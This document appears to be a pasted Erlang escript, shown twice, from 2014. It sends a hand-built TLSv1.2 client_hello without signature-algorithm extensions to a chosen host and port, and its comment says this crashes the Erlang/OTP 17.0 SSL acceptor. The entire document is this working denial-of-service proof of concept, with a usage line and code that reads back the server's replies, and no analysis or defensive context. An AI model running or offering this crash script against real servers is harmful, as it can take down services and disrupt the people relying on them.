stolen · April 19, 2014 13:08
diff --git a/tlsv12_no_hs.escript b/tlsv12_no_hs.escript
 #!/usr/bin/env escript
 %% -*- mode: erlang -*-
 %% vim: sw=2 ts=2
 % This escript sends valid TLSv1.2 client_hello to specified server
 % crashing the OTP 17.0 acceptor due to bad hashsign default value
 %
 % Usage example:    ./tlsv12_no_hs.escript localhost 9998

 -module(tlsv12_no_hs).
 -include_lib("ssl/src/ssl_handshake.hrl").

 client_hello() ->
  <<22, 3,3, 47:16,     % TLSv1.2 handshake
    1, 43:24,           % client_hello, length
    3,3,                % TLSv1.2
    16#deadbeef:256,    % 32 'random' bytes = 256 bits
    0,                  % no session ID
    4:16, 0,255,0,51,   % null suite and some dhe_rsa suite
    1, 0                % no compression
    % No extensions here -> no hashsign_algos in client_hello
  >>.

 main([Host, PortStr]) ->
  run(Host, list_to_integer(PortStr)).

 run(Host, Port) ->
  {ok, S} = gen_tcp:connect(Host, Port, [binary, {active, false}]),
  ok = gen_tcp:send(S, client_hello()),
  {ok, <<22, RecMajor:8, RecMinor:8, _RecLen:16, 2, HelloLen:24>>} = gen_tcp:recv(S, 9, 10000),
  {ok, <<HelloBin:HelloLen/binary>>} = gen_tcp:recv(S, HelloLen, 5000),
  #server_hello{} = ServerHello = tls_handshake:decode_handshake({RecMajor, RecMinor}, 2, HelloBin),
  #server_hello{
    server_version = ServerVer,
    cipher_suite = CipherSuite } = ServerHello,
  io:format("Received server_hello of version ~w with cipher suite ~w~n", [ServerVer, ssl:suite_definition(CipherSuite)]),
  recv_records(S).

 recv_records(S) ->
  {ok, <<RecType:8, _RecMajor:8, _RecMinor:8, RecLen:16>>} = gen_tcp:recv(S, 5, 1000),
  {ok, <<Frag:RecLen/binary>>} = gen_tcp:recv(S, RecLen, 500),
  io:format("Received record type ~w (~w bytes): ~160P~n", [RecType, RecLen, Frag, 10]),
  recv_records(S).
	#!/usr/bin/env escript
	%% -- mode: erlang --
	%% vim: sw=2 ts=2
	% This escript sends valid TLSv1.2 client_hello to specified server
	% crashing the OTP 17.0 acceptor due to bad hashsign default value
	%
	% Usage example: ./tlsv12_no_hs.escript localhost 9998

	-module(tlsv12_no_hs).
	-include_lib("ssl/src/ssl_handshake.hrl").

	client_hello() ->
	<<22, 3,3, 47:16, % TLSv1.2 handshake
	1, 43:24, % client_hello, length
	3,3, % TLSv1.2
	16#deadbeef:256, % 32 'random' bytes = 256 bits
	0, % no session ID
	4:16, 0,255,0,51, % null suite and some dhe_rsa suite
	1, 0 % no compression
	% No extensions here -> no hashsign_algos in client_hello
	>>.

	main([Host, PortStr]) ->
	run(Host, list_to_integer(PortStr)).

	run(Host, Port) ->
	{ok, S} = gen_tcp:connect(Host, Port, [binary, {active, false}]),
	ok = gen_tcp:send(S, client_hello()),
	{ok, <<22, RecMajor:8, RecMinor:8, _RecLen:16, 2, HelloLen:24>>} = gen_tcp:recv(S, 9, 10000),
	{ok, <<HelloBin:HelloLen/binary>>} = gen_tcp:recv(S, HelloLen, 5000),
	#server_hello{} = ServerHello = tls_handshake:decode_handshake({RecMajor, RecMinor}, 2, HelloBin),
	#server_hello{
	server_version = ServerVer,
	cipher_suite = CipherSuite } = ServerHello,
	io:format("Received server_hello of version ~w with cipher suite ~w~n", [ServerVer, ssl:suite_definition(CipherSuite)]),
	recv_records(S).

	recv_records(S) ->
	{ok, <<RecType:8, _RecMajor:8, _RecMinor:8, RecLen:16>>} = gen_tcp:recv(S, 5, 1000),
	{ok, <<Frag:RecLen/binary>>} = gen_tcp:recv(S, RecLen, 500),
	io:format("Received record type ~w (~w bytes): ~160P~n", [RecType, RecLen, Frag, 10]),
	recv_records(S).